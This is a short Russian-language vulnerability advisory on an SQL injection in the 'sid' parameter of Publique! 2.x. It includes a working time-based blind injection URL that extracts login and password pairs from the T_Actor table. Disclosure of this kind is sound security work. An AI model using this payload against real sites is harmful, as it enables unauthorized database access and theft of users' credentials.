Программа: Publique! 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "sid" сценарием cgi/cgilua.exe/sys/start.htm.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://your_website.com/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+UNION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,’:’,F_Password)+FROM
+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97), BENCHMARK(1000000,MD5(‘A’)),0)%23



Оставить мнение